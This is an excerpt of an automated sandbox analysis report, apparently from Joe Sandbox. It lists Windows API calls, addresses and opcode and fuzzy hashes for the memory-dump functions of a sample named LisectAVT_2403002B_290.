                                                                                                                                                                                                                          • API ID: ObjectRect$ClientDeleteFillSelect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3522820569-0
                                                                                                                                                                                                                          • Opcode ID: e1226587be8be15bcf8161aee864cef9789dc1afa6e9cc42e337da21b47d7f2b
                                                                                                                                                                                                                          • Instruction ID: 865ed62e204f999886674634bdac8c5fb271fad3e2ed5c8a8075e854c35c8e72
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1226587be8be15bcf8161aee864cef9789dc1afa6e9cc42e337da21b47d7f2b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C43182762043029FD3109B28EC48BA7BBB9FFD4311F04552AF94986320DB76DC91CB65
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044B340), ref: 00411A19
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00411A29
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00411A4A
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00411A8E
                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00411A98
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,00000004,?), ref: 00411AA5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalCurrentSection$CacheEnterFlushInstructionLeaveLongProcessThreadWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3823208529-0
                                                                                                                                                                                                                          • Opcode ID: 07a1dbbba7aca397bf205b4bf3402bca78ea00ce08c76a63137ae00674a9b799
                                                                                                                                                                                                                          • Instruction ID: 37a676f5cb27032d0318369953a16ba400cad8c49294232363eb4eb626f908f1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07a1dbbba7aca397bf205b4bf3402bca78ea00ce08c76a63137ae00674a9b799
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A821A132301310AFD7208FA5D8C4A27BFA4FF48714B08896AEA498B211C774EC41CB75
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044B340), ref: 00411F59
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00411F69
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00411F8A
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00411FCE
                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00411FD8
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00411FE5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalCurrentSection$CacheEnterFlushInstructionLeaveLongProcessThreadWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3823208529-0
                                                                                                                                                                                                                          • Opcode ID: bf9cfbff74908a5fb2d3181698138ae9454327fa4517f6e569a916d9ff9d2852
                                                                                                                                                                                                                          • Instruction ID: 12e269af356ffb42e89dcecac3084760c7acb0868c2f02fce1b83a7edaf6f50e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf9cfbff74908a5fb2d3181698138ae9454327fa4517f6e569a916d9ff9d2852
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA219232304310AFD7209FA5EDC4E27BBA4FB487147188A6AEE498B266C775DC41CB75
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ClientToScreen.USER32(?), ref: 00415827
                                                                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00415839
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00415842
                                                                                                                                                                                                                          • ScreenToClient.USER32(00000000), ref: 00415850
                                                                                                                                                                                                                          • ScreenToClient.USER32(00000000,?), ref: 00415860
                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00415884
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClientScreen$MoveParentWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2420994850-0
                                                                                                                                                                                                                          • Opcode ID: e708bffe7d4ed9b0d7b5ab86a1ff5b96d1dd09eb2dc1c1421c56ee2158abb95a
                                                                                                                                                                                                                          • Instruction ID: cb2595f71ca4477885d93d82fefb541c649833f727a180719ed1214593514184
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e708bffe7d4ed9b0d7b5ab86a1ff5b96d1dd09eb2dc1c1421c56ee2158abb95a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B214C72104202AFD701DF55DC84AABFBE8FF88350F04892DF98887260D771AC51CB65
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __CreateFrameInfo.LIBCMT ref: 004290ED
                                                                                                                                                                                                                            • Part of subcall function 004257F4: __getptd.LIBCMT ref: 00425802
                                                                                                                                                                                                                            • Part of subcall function 004257F4: __getptd.LIBCMT ref: 00425810
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 004290F7
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00429105
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00429113
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0042911E
                                                                                                                                                                                                                          • _CallCatchBlock2.LIBCMT ref: 00429144
                                                                                                                                                                                                                            • Part of subcall function 00425899: __CallSettingFrame@12.LIBCMT ref: 004258E5
                                                                                                                                                                                                                            • Part of subcall function 004291EB: __getptd.LIBCMT ref: 004291FA
                                                                                                                                                                                                                            • Part of subcall function 004291EB: __getptd.LIBCMT ref: 00429208
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1602911419-0
                                                                                                                                                                                                                          • Opcode ID: e5377473d883af5e36911d90b7befaa7ab26b17d990b8ef33e783adc5ccc14be
                                                                                                                                                                                                                          • Instruction ID: b999dcdba1427255f3dfb1c667b010caa462ff74c4b9d88451a5c342c024839a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5377473d883af5e36911d90b7befaa7ab26b17d990b8ef33e783adc5ccc14be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06111C71D00219DFDF00EFA5E945AAD7BB0FF04314F51806EF814A7251DB799A119F58
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetLayeredWindowAttributes.USER32 ref: 0041525D
                                                                                                                                                                                                                            • Part of subcall function 00423750: RtlInitializeCriticalSection.NTDLL(?), ref: 00423790
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0041541E
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0041542B
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00415454
                                                                                                                                                                                                                          • CreateAcceleratorTableA.USER32(?,00000001), ref: 0041549D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClientRect$AcceleratorAttributesCreateCriticalInitializeLayeredParentSectionTableWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3375822417-0
                                                                                                                                                                                                                          • Opcode ID: 45d69983561acb0787a1e87c84148cf3fe4b02d4f4df03dbabd8213c6035e985
                                                                                                                                                                                                                          • Instruction ID: 6c39a8f56b411056154fd32cd0cf0432356b21fcc375bf42b615943a6af84bd3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45d69983561acb0787a1e87c84148cf3fe4b02d4f4df03dbabd8213c6035e985
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45A10271605B01DFD750CF29C484B9ABBE0FF88714F148A6EE8899B351D7B5E881CB86
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 00418E1D
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 00418E26
                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00418E87
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000003,00000000,00000000,000000FF,?,-00000002,00000000,00000000,80070057), ref: 00418EE8
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00418F0D
                                                                                                                                                                                                                            • Part of subcall function 0042592A: __lock.LIBCMT ref: 00425948
                                                                                                                                                                                                                            • Part of subcall function 0042592A: ___sbh_find_block.LIBCMT ref: 00425953
                                                                                                                                                                                                                            • Part of subcall function 0042592A: ___sbh_free_block.LIBCMT ref: 00425962
                                                                                                                                                                                                                            • Part of subcall function 0042592A: HeapFree.KERNEL32(00000000,00000001,00442338,0000000C,00429C99,00000000,00442590,0000000C,00429CD3,00000001,004282ED,?,0042B2C2,00000004,00442610,0000000C), ref: 00425992
                                                                                                                                                                                                                            • Part of subcall function 0042592A: GetLastError.KERNEL32(?,0042B2C2,00000004,00442610,0000000C,0042D625,00000001,004282FC,00000000,00000000,00000000,?,004282FC,00000001,00000214), ref: 004259A3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$ByteCharEnterErrorFreeHeapLastLeaveMultiWide___sbh_find_block___sbh_free_block__lock_malloclstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2649083834-0
                                                                                                                                                                                                                          • Opcode ID: ef1b224d8926f9a9dfcc6db4d708e97175d39be32bb4f1fa101077006c2e8634
                                                                                                                                                                                                                          • Instruction ID: ef69da5e920178eb1dcc70a03244176e842f214767484c64cd14ef8785300be5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef1b224d8926f9a9dfcc6db4d708e97175d39be32bb4f1fa101077006c2e8634
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E41E271B002159BDB048EA89C80BAB77669B94314F04827EFD18DB391DE78DD4587C9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 00410127
                                                                                                                                                                                                                          • std::_String_base::_Xlen.LIBCPMT ref: 004100D5
                                                                                                                                                                                                                            • Part of subcall function 00423A4B: __EH_prolog3.LIBCMT ref: 00423A52
                                                                                                                                                                                                                            • Part of subcall function 00423A4B: std::bad_exception::bad_exception.LIBCMT ref: 00423A6F
                                                                                                                                                                                                                            • Part of subcall function 00423A4B: __CxxThrowException@8.LIBCMT ref: 00423A7D
                                                                                                                                                                                                                          • std::_String_base::_Xlen.LIBCPMT ref: 0041014F
                                                                                                                                                                                                                          • _memmove_s.LIBCMT ref: 0041018C
                                                                                                                                                                                                                          • _memmove_s.LIBCMT ref: 004101D7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: String_base::_Xlen_memmove_sstd::_$Exception@8H_prolog3Throw_memcpy_sstd::bad_exception::bad_exception
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2104318304-0
                                                                                                                                                                                                                          • Opcode ID: 0e18c90c5c1943eaeac10e3d21b7095421590bb7663952c0f9bed313bbdb744d
                                                                                                                                                                                                                          • Instruction ID: 86bfcc1c74f1fc0be6eeef633fbe502bd8068da502ff08f6d6f7ea803161ce8a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e18c90c5c1943eaeac10e3d21b7095421590bb7663952c0f9bed313bbdb744d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A41F671604A0ABFD314DE19DA80966B3B6FB81300B50872AD42547A42D7B9FDD4C7E9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044E240), ref: 00418CC0
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00418528), ref: 00418D0E
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044E240), ref: 00418D52
                                                                                                                                                                                                                          • RtlDeleteCriticalSection.NTDLL(0044E240), ref: 00418D65
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00418528), ref: 00418DAB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$ExceptionRaise$DeleteEnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2896116776-0
                                                                                                                                                                                                                          • Opcode ID: 60206436312a941d5767896499db39d50c55b2d1c6d036ca9e5b6b81282be627
                                                                                                                                                                                                                          • Instruction ID: 78883e933ddfd575a463b6ae8765c2241207876390ae6ac4d6d0b6bdd00743fe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60206436312a941d5767896499db39d50c55b2d1c6d036ca9e5b6b81282be627
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C241A7B26006149BEF50DF15FC85B5777A5EF50318F18C0AEE8098F246DB79E880CBA9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFocus.USER32(?,?,?,?,?,00415A10,?,?,?,00000001), ref: 00416F26
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Focus
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2734777837-0
                                                                                                                                                                                                                          • Opcode ID: 84ac6bd9c287139542d71f7be3785e708337f064b3dcd2006f309b01502409ea
                                                                                                                                                                                                                          • Instruction ID: bf3b8484ead40ab7a99336afcf803f5614de82c4d018cbf0b84b9aed1ee85005
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84ac6bd9c287139542d71f7be3785e708337f064b3dcd2006f309b01502409ea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF418F70208200AFDF049F64D888BA67BA9FF49304F1945A9FD49CA2A6D774DC45CF25
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFocus.USER32(?,?,?,?,?,004159B8,?,?,?,00000001), ref: 00416DD1
                                                                                                                                                                                                                          • GetFocus.USER32 ref: 00416DD9
                                                                                                                                                                                                                          • IsChild.USER32(?,00000000), ref: 00416DE3
                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00416DF2
                                                                                                                                                                                                                          • SetFocus.USER32(00000000,?,?,?,?,004159B8,?,?,?,00000001), ref: 00416DF9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Focus$ChildWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 501040988-0
                                                                                                                                                                                                                          • Opcode ID: c793180608d0979724f0a838961f09ecc627f66463751f4145e1aa4c09185380
                                                                                                                                                                                                                          • Instruction ID: 8b2d6c618c82d252263e44c6a5238523959aa71bdc741b18c4e8e08c9a1a1d5c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c793180608d0979724f0a838961f09ecc627f66463751f4145e1aa4c09185380
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7215070204248AFDB209F64DC08BAA7BA9EF49315F15455DF8498A290DB74DD41CB65
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000C,00423DAF,00000000,00411A70), ref: 00423CDB
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(0043AE1C,00000000,00000000,?), ref: 00423CF4
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00423D50
                                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00423D66
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00423D76
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateCompareExchangeFeatureFreeInterlockedLibraryLoadPresentProcessor
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 354369530-0
                                                                                                                                                                                                                          • Opcode ID: 8b5377b81b319b1867c463ea3525ab7744f2fc5701bdfb4c03f065609460afcb
                                                                                                                                                                                                                          • Instruction ID: bad696d248039219c0635516f435c0c90e3ca1e931be28e5b90198828d8a9e0e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b5377b81b319b1867c463ea3525ab7744f2fc5701bdfb4c03f065609460afcb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7116375750211AFEB209F76EC88A1737B9FB49742B54543AE501D3250D778DC01CB68
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CallWindowProcA.USER32(?,?), ref: 00411EA9
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 00411EBD
                                                                                                                                                                                                                          • CallWindowProcA.USER32(?,?,?,?,?), ref: 00411ED4
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 00411EEE
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00411F02
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Long$CallProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 513923721-0
                                                                                                                                                                                                                          • Opcode ID: acdbc3f6024d0cc222a47a8be08bc14946d49dca3716f0fa29b8912c03d98ade
                                                                                                                                                                                                                          • Instruction ID: f482abc3086895b13e65d7ed397f34a26d7f9aa96c4cf6a1d5cca4a790af85b8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: acdbc3f6024d0cc222a47a8be08bc14946d49dca3716f0fa29b8912c03d98ade
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02212775508100EFCB008F18D984956BFB1FF98321B2486A6FD599A3BAC335DD52DB58
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0042BBEA
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A
                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 0042BC0A
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 0042BC1A
                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0042BC37
                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(00449610), ref: 0042BC62
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4271482742-0
                                                                                                                                                                                                                          • Opcode ID: c7ae05eb49a4645ac65517e963bcd5d50b5c60d1e603a2dea6a3ff1ef9c62e76
                                                                                                                                                                                                                          • Instruction ID: 52685b4dcb39849911ff3693f870a45c18f8edff1e4251c2b4a25b8dbaeea7ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7ae05eb49a4645ac65517e963bcd5d50b5c60d1e603a2dea6a3ff1ef9c62e76
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB01A532B00A31ABDA10AB66B80634A7360EB00720F86401FE810B3380CB28AC81DBDD
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00425948
                                                                                                                                                                                                                            • Part of subcall function 00429CB8: __mtinitlocknum.LIBCMT ref: 00429CCE
                                                                                                                                                                                                                            • Part of subcall function 00429CB8: __amsg_exit.LIBCMT ref: 00429CDA
                                                                                                                                                                                                                            • Part of subcall function 00429CB8: RtlEnterCriticalSection.NTDLL(004282ED), ref: 00429CE2
                                                                                                                                                                                                                          • ___sbh_find_block.LIBCMT ref: 00425953
                                                                                                                                                                                                                          • ___sbh_free_block.LIBCMT ref: 00425962
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000001,00442338,0000000C,00429C99,00000000,00442590,0000000C,00429CD3,00000001,004282ED,?,0042B2C2,00000004,00442610,0000000C), ref: 00425992
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0042B2C2,00000004,00442610,0000000C,0042D625,00000001,004282FC,00000000,00000000,00000000,?,004282FC,00000001,00000214), ref: 004259A3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2714421763-0
                                                                                                                                                                                                                          • Opcode ID: a52d7784b9870ce3fb532fb8a395eec7211f746b9cf291a412798ea6c2133b02
                                                                                                                                                                                                                          • Instruction ID: 784fe8f7d40001f7600859eb2be024fca0bf4e15d789c35dff29e27069072cfd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a52d7784b9870ce3fb532fb8a395eec7211f746b9cf291a412798ea6c2133b02
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A014471B05622EAEF206B72BD0975E76A49F00735FE5411FF404661D1CA7C89818A5D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F637
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F64E
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040F656
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F670
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F686
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 8f4c0706dec5b921881070b828bc059f98067ef9a44a745b39d12aca68c25be2
                                                                                                                                                                                                                          • Instruction ID: a6e47eae5d4f7697fc9870831a46e4352dda564a31e996fcfd64f3f94e2429e5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f4c0706dec5b921881070b828bc059f98067ef9a44a745b39d12aca68c25be2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64F037B4648300BFE3708B609C85FE777A9E784B01F109968F695966C0C6B458429B29
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F84B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F85B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F863
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F86F
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F87E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: fe8ab35d2d4b76678f8eaa2d491c1a62432b4a2dd4fa43c40ff848aece5ca14c
                                                                                                                                                                                                                          • Instruction ID: f30965056506db091dc390cd5668a26ed455dcdbe33213fe5701eb603ec7fe18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe8ab35d2d4b76678f8eaa2d491c1a62432b4a2dd4fa43c40ff848aece5ca14c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08E042B1289614BBF65117B06C4EFFA362DEB14B02F106420F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
